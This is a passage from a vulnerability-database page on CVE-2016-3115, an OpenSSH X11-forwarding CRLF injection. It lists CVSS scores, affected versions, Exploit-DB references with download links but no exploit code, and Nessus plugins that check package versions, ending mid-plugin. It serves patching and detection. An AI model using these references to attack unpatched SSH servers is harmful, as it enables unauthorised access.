Vulnerabilities > CVE-2016-3115

CVSS 6.4 - MEDIUM

Attack vector

NETWORK

Attack complexity

LOW

Privileges required

LOW

Confidentiality impact

LOW

Integrity impact

LOW

Availability impact

NONE

network

low complexity

openbsd

oracle

nessus

exploit available

NVD

Published: 2016-03-22

Updated: 2018-09-11

Summary

Multiple CRLF injection vulnerabilities in session.c in sshd in OpenSSH before 7.2p2 allow remote authenticated users to bypass intended shell-command restrictions via crafted X11 forwarding data, related to the (1) do_authenticated1 and (2) session_x11_req functions.

Vulnerable Configurations

Part	Description	Count
Application	Openbsd Openbsd Openssh 1.2.2 Openbsd Openssh 1.2.3 Openbsd Openssh 2.1.0 Openbsd Openssh 2.1.1 Openbsd Openssh 2.2.0 Openbsd Openssh 2.3.0 Openbsd Openssh 2.5.1 Openbsd Openssh 2.9 Openbsd Openssh 2.9.9 Openbsd Openssh 3.0 Openbsd Openssh 3.0.1 Openbsd Openssh 3.0.2 Openbsd Openssh 3.1 Openbsd Openssh 3.2.2 Openbsd Openssh 3.2.3 Openbsd Openssh 3.3 Openbsd Openssh 3.4 Openbsd Openssh 3.5 Openbsd Openssh 3.6 Openbsd Openssh 3.6.1 Openbsd Openssh 3.7.1 Openbsd Openssh 3.8 Openbsd Openssh 3.8.1 Openbsd Openssh 3.9 Openbsd Openssh 3.9.1 Openbsd Openssh 4.0 Openbsd Openssh 4.1 Openbsd Openssh 4.2 Openbsd Openssh 4.3 Openbsd Openssh 4.4 Openbsd Openssh 4.5 Openbsd Openssh 4.6 Openbsd Openssh 4.7 Openbsd Openssh 4.8 Openbsd Openssh 4.9 Openbsd Openssh 5.0 Openbsd Openssh 5.1 Openbsd Openssh 5.2 Openbsd Openssh 5.3 Openbsd Openssh 5.4 Openbsd Openssh 5.5 Openbsd Openssh 5.6 Openbsd Openssh 5.7 Openbsd Openssh 5.8 Openbsd Openssh 5.9 Openbsd Openssh 6.0 Openbsd Openssh 6.1 Openbsd Openssh 6.2 Openbsd Openssh 6.3 Openbsd Openssh 6.4 Openbsd Openssh 6.5 Openbsd Openssh 6.6 Openbsd Openssh 6.7 Openbsd Openssh 6.8 Openbsd Openssh 6.9 Openbsd Openssh 7.0 Openbsd Openssh 7.1 Openbsd Openssh 7.2	58
OS	Oracle Oracle VM Server 3.2	1

Exploit-Db

description	BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit. Remote exploit for Hardware platform
id	EDB-ID:40858
last seen	2016-12-04
modified	2016-12-04
published	2016-12-04
reporter	Exploit-DB
source	https://www.exploit-db.com/download/40858/
title	BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Root Exploit

description	OpenSSH 7.2p1 - xauth Injection. CVE-2016-3115. Remote exploits for multiple platform
file	exploits/multiple/remote/39569.py
id	EDB-ID:39569
last seen	2016-03-17
modified	2016-03-16
platform	multiple
port	22
published	2016-03-16
reporter	tintinweb
source	https://www.exploit-db.com/download/39569/
title	OpenSSH <= 7.2p1 - xauth Injection
type	remote

Nessus

NASL family	Huawei Local Security Checks
NASL id	EULEROS_SA-2016-1008.NASL
description	According to the versions of the openssh packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) - An access flaw was discovered in OpenSSH the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-05-06
modified	2017-05-01
plugin id	99771
published	2017-05-01
reporter	This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/99771
title	EulerOS 2.0 SP1 : openssh (EulerOS-SA-2016-1008)
code	# # (C) Tenable Network Security, Inc. # include("compat.inc"); if (description) { script_id(99771); script_version("1.13"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/05/04"); script_cve_id( "CVE-2016-1908", "CVE-2016-3115" ); script_name(english:"EulerOS 2.0 SP1 : openssh (EulerOS-SA-2016-1008)"); script_summary(english:"Checks the rpm output for the updated packages."); script_set_attribute(attribute:"synopsis", value: "The remote EulerOS host is missing multiple security updates."); script_set_attribute(attribute:"description", value: "According to the versions of the openssh packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities : - It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) - An access flaw was discovered in OpenSSH the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) Note that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues."); # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1008 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?48f275ff"); script_set_attribute(attribute:"solution", value: "Update the affected openssh packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2017/05/01"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-keycat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:huawei:euleros:openssh-server"); script_set_attribute(attribute:"cpe", value:"cpe:/o:huawei:euleros:2.0"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_family(english:"Huawei Local Security Checks"); script_copyright(english:"This script is Copyright (C) 2017-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/EulerOS/release", "Host/EulerOS/rpm-list", "Host/EulerOS/sp"); script_exclude_keys("Host/EulerOS/uvp_version"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/EulerOS/release"); if (isnull(release) \|\| release !~ "^EulerOS") audit(AUDIT_OS_NOT, "EulerOS"); if (release !~ "^EulerOS release 2\.0(\D\|$)") audit(AUDIT_OS_NOT, "EulerOS 2.0"); sp = get_kb_item("Host/EulerOS/sp"); if (isnull(sp) \|\| sp !~ "^(1)$") audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1"); uvp = get_kb_item("Host/EulerOS/uvp_version"); if (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, "EulerOS 2.0 SP1", "EulerOS UVP " + uvp); if (!get_kb_item("Host/EulerOS/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "aarch64" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "EulerOS", cpu); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_ARCH_NOT, "i686 / x86_64", cpu); flag = 0; pkgs = ["openssh-6.6.1p1-25.4.h3", "openssh-askpass-6.6.1p1-25.4.h3", "openssh-clients-6.6.1p1-25.4.h3", "openssh-keycat-6.6.1p1-25.4.h3", "openssh-server-6.6.1p1-25.4.h3"]; foreach (pkg in pkgs) if (rpm_check(release:"EulerOS-2.0", sp:"1", reference:pkg)) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh"); }

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2016-D339D610C1.NASL
description	This update provides recent upstrem fix published with openssh-7.2p2 (#1316529). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2016-04-01
plugin id	90285
published	2016-04-01
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90285
title	Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2016-d339d610c1. # include("compat.inc"); if (description) { script_id(90285); script_version("2.5"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-3115"); script_xref(name:"FEDORA", value:"2016-d339d610c1"); script_name(english:"Fedora 22 : openssh-6.9p1-11.fc22 (2016-d339d610c1)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "This update provides recent upstrem fix published with openssh-7.2p2 (#1316529). Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1316829" ); # https://lists.fedoraproject.org/pipermail/package-announce/2016-March/180491.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?9163a8a7" ); script_set_attribute( attribute:"solution", value:"Update the affected openssh package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:openssh"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/29"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/04/01"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^22([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC22", reference:"openssh-6.9p1-11.fc22")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh"); }

NASL family	Red Hat Local Security Checks
NASL id	REDHAT-RHSA-2016-0465.NASL
description	Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD
last seen	2020-06-01
modified	2020-06-02
plugin id	90078
published	2016-03-22
reporter	This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90078
title	RHEL 7 : openssh (RHSA-2016:0465)
code	# # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Red Hat Security Advisory RHSA-2016:0465. The text # itself is copyright (C) Red Hat, Inc. # include("compat.inc"); if (description) { script_id(90078); script_version("2.17"); script_cvs_date("Date: 2019/10/24 15:35:41"); script_cve_id("CVE-2016-1908", "CVE-2016-3115"); script_xref(name:"RHSA", value:"2016:0465"); script_name(english:"RHEL 7 : openssh (RHSA-2016:0465)"); script_summary(english:"Checks the rpm output for the updated packages"); script_set_attribute( attribute:"synopsis", value:"The remote Red Hat host is missing one or more security updates." ); script_set_attribute( attribute:"description", value: "Updated openssh packages that fix two security issues are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section. OpenSSH is OpenBSD's SSH (Secure Shell) protocol implementation. These packages include the core files necessary for both the OpenSSH client and server. It was discovered that the OpenSSH server did not sanitize data received in requests to enable X11 forwarding. An authenticated client with restricted SSH access could possibly use this flaw to bypass intended restrictions. (CVE-2016-3115) An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested. (CVE-2016-1908) All openssh users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing this update, the OpenSSH server daemon (sshd) will be restarted automatically." ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/errata/RHSA-2016:0465" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-1908" ); script_set_attribute( attribute:"see_also", value:"https://access.redhat.com/security/cve/cve-2016-3115" ); script_set_attribute(attribute:"solution", value:"Update the affected packages."); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-askpass"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-clients"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-debuginfo"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-keycat"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-ldap"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:openssh-server-sysvinit"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:pam_ssh_agent_auth"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.2"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.3"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.4"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.5"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.6"); script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:7.7"); script_set_attribute(attribute:"vuln_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/03/21"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/03/22"); script_set_attribute(attribute:"generated_plugin", value:"current"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Red Hat Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("misc_func.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat"); os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat"); os_ver = os_ver[1]; if (! preg(pattern:"^7([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 7.x", "Red Hat " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu); yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo"); if (!empty_or_null(yum_updateinfo)) { rhsa = "RHSA-2016:0465"; yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa); if (!empty_or_null(yum_report)) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : yum_report ); exit(0); } else { audit_message = "affected by Red Hat security advisory " + rhsa; audit(AUDIT_OS_NOT, audit_message); } } else { flag = 0; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-askpass-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-clients-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", reference:"openssh-debuginfo-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-keycat-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-ldap-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-server-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"s390x", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", cpu:"x86_64", reference:"openssh-server-sysvinit-6.6.1p1-25.el7_2")) flag++; if (rpm_check(release:"RHEL7", reference:"pam_ssh_agent_auth-0.9.3-9.25.el7_2")) flag++; if (flag) { security_report_v4( port : 0, severity : SECURITY_HOLE, extra : rpm_report_get() + redhat_report_package_caveat() ); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "openssh / openssh-askpass / openssh-clients / openssh-debuginfo / etc"); } }

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2016-FC1CC33E05.NASL
description	Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2016-04-27
plugin id	90740
published	2016-04-27
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90740
title	Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2016-fc1cc33e05. # include("compat.inc"); if (description) { script_id(90740); script_version("2.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-3115"); script_xref(name:"FEDORA", value:"2016-fc1cc33e05"); script_name(english:"Fedora 22 : gsi-openssh-6.9p1-8.fc22 (2016-fc1cc33e05)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1318201" ); # https://lists.fedoraproject.org/pipermail/package-announce/2016-April/183101.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?354d4b7a" ); script_set_attribute( attribute:"solution", value:"Update the affected gsi-openssh package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:gsi-openssh"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:22"); script_set_attribute(attribute:"patch_publication_date", value:"2016/04/25"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/04/27"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^22([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 22.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC22", reference:"gsi-openssh-6.9p1-8.fc22")) flag++; if (flag) { if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get()); else security_warning(0); exit(0); } else { tested = pkg_tests_get(); if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested); else audit(AUDIT_PACKAGE_NOT_INSTALLED, "gsi-openssh"); }

NASL family	Fedora Local Security Checks
NASL id	FEDORA_2016-08E5803496.NASL
description	Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.
last seen	2020-06-05
modified	2016-05-09
plugin id	90947
published	2016-05-09
reporter	This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof.
source	https://www.tenable.com/plugins/nessus/90947
title	Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)
code	#%NASL_MIN_LEVEL 80502 # # (C) Tenable Network Security, Inc. # # The descriptive text and package checks in this plugin were # extracted from Fedora Security Advisory 2016-08e5803496. # include("compat.inc"); if (description) { script_id(90947); script_version("2.4"); script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/04"); script_cve_id("CVE-2016-3115"); script_xref(name:"FEDORA", value:"2016-08e5803496"); script_name(english:"Fedora 24 : gsi-openssh-7.2p2-2.fc24 (2016-08e5803496)"); script_summary(english:"Checks rpm output for the updated package."); script_set_attribute( attribute:"synopsis", value:"The remote Fedora host is missing a security update." ); script_set_attribute( attribute:"description", value: "Sync with openssh package. Note that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues." ); script_set_attribute( attribute:"see_also", value:"https://bugzilla.redhat.com/show_bug.cgi?id=1318201" ); # https://lists.fedoraproject.org/pipermail/package-announce/2016-May/184264.html script_set_attribute( attribute:"see_also", value:"http://www.nessus.org/u?57a55728" ); script_set_attribute( attribute:"solution", value:"Update the affected gsi-openssh package." ); script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"); script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C"); script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"); script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C"); script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available"); script_set_attribute(attribute:"exploit_available", value:"true"); script_set_attribute(attribute:"plugin_type", value:"local"); script_set_attribute(attribute:"cpe", value:"p-cpe:/a:fedoraproject:fedora:gsi-openssh"); script_set_attribute(attribute:"cpe", value:"cpe:/o:fedoraproject:fedora:24"); script_set_attribute(attribute:"patch_publication_date", value:"2016/05/07"); script_set_attribute(attribute:"plugin_publication_date", value:"2016/05/09"); script_end_attributes(); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2016-2020 and is owned by Tenable, Inc. or an Affiliate thereof."); script_family(english:"Fedora Local Security Checks"); script_dependencies("ssh_get_info.nasl"); script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list"); exit(0); } include("audit.inc"); include("global_settings.inc"); include("rpm.inc"); if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED); release = get_kb_item("Host/RedHat/release"); if (isnull(release) \|\| "Fedora" >!< release) audit(AUDIT_OS_NOT, "Fedora"); os_ver = eregmatch(pattern: "Fedora.*release ([0-9]+)", string:release); if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Fedora"); os_ver = os_ver[1]; if (! ereg(pattern:"^24([^0-9]\|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Fedora 24.x", "Fedora " + os_ver); if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING); cpu = get_kb_item("Host/cpu"); if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH); if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Fedora", cpu); flag = 0; if (rpm_check(release:"FC24", 